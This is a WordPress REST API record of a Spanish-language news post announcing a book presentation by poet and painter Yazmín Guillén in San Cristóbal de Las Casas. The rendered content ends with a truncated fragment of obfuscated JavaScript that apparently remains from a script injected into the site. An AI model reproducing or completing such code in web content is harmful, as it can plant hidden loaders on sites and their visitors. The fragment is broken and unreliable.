{"id":16508,"date":"2024-07-04T01:07:10","date_gmt":"2024-07-04T01:07:10","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16508"},"modified":"2024-07-04T01:07:11","modified_gmt":"2024-07-04T01:07:11","slug":"presentaran-obras-de-yazmin-guillen-en-el-centro-recreativo-cultural-el-rastro","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16508","title":{"rendered":"Presentar\u00e1n obras de Yazm\u00edn Guill\u00e9n en el Centro Recreativo Cultural &#8220;El Rastro&#8221;"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1066\" height=\"1600\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240703-WA0020.jpg\" alt=\"\" class=\"wp-image-16510\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240703-WA0020.jpg 1066w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240703-WA0020-200x300.jpg 200w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240703-WA0020-682x1024.jpg 682w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240703-WA0020-768x1153.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/IMG-20240703-WA0020-1023x1536.jpg 1023w\" sizes=\"auto, (max-width: 1066px) 100vw, 1066px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>3 de julio del 2024. San Crist\u00f3bal de Las Casas.- Este viernes 5 de julio a las 5 de la tarde, la destacada poetisa y pintora Yazm\u00edn Guill\u00e9n presentar\u00e1 sus obras a trav\u00e9s de dos libros titulados &#8220;Desde el coraz\u00f3n&#8221; y *Sin mirar atr\u00e1s&#8221; en el Centro Recreativo Cultural &#8220;El Rastro&#8221;. Guill\u00e9n, quien ha sido invitada por la editorial Duvalier, espera compartir con el p\u00fablico sus profundas y emotivas creaciones.<\/p>\n\n\n\n<p>En entrevista, comparti\u00f3 detalles sobre el contenido de sus libros. Sin mirar atr\u00e1s recopila poemas que, en sus palabras, &#8220;fueron una catarsis de mi vida en diferentes etapas&#8221;. Estos poemas abordan diversas tem\u00e1ticas y reflejan sentimientos profundos y emociones vividas en el pasado y presente de la autora.<\/p>\n\n\n\n<p>Por otro lado, &#8220;Desde el coraz\u00f3n&#8221; combina poes\u00eda y pintura, donde cada obra pl\u00e1stica va acompa\u00f1ada de una descripci\u00f3n y un significado personal. Guill\u00e9n expres\u00f3 que esta obra comenz\u00f3 por una decisi\u00f3n propia: &#8220;Me encanta pintar en \u00f3leo y perfeccion\u00e9 mi t\u00e9cnica&#8221;. Cada pintura en el libro representa una etapa de su vida y lleva consigo una historia \u00fanica.<\/p>\n\n\n\n<p>La autora extendi\u00f3 una cordial invitaci\u00f3n a todos los interesados a asistir a la presentaci\u00f3n de sus libros. Ser\u00e1 una oportunidad para adentrarse en el universo emocional y art\u00edstico de Yazm\u00edn Guill\u00e9n, y conocer de cerca sus obras literarias y pict\u00f3ricas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 3 de julio del 2024. San Crist\u00f3bal de Las Casas.- Este viernes 5 de julio a las 5 de la tarde, la destacada poetisa y pintora Yazm\u00edn Guill\u00e9n presentar\u00e1 sus obras a trav\u00e9s de dos libros titulados &#8220;Desde el coraz\u00f3n&#8221; y *Sin mirar atr\u00e1s&#8221; en el Centro Recreativo Cultural &#8220;El Rastro&#8221;. Guill\u00e9n, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16510,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-16508","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16508","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16508"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16508\/revisions"}],"predecessor-version":[{"id":16511,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16508\/revisions\/16511"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16510"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16508"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16508"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16508"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}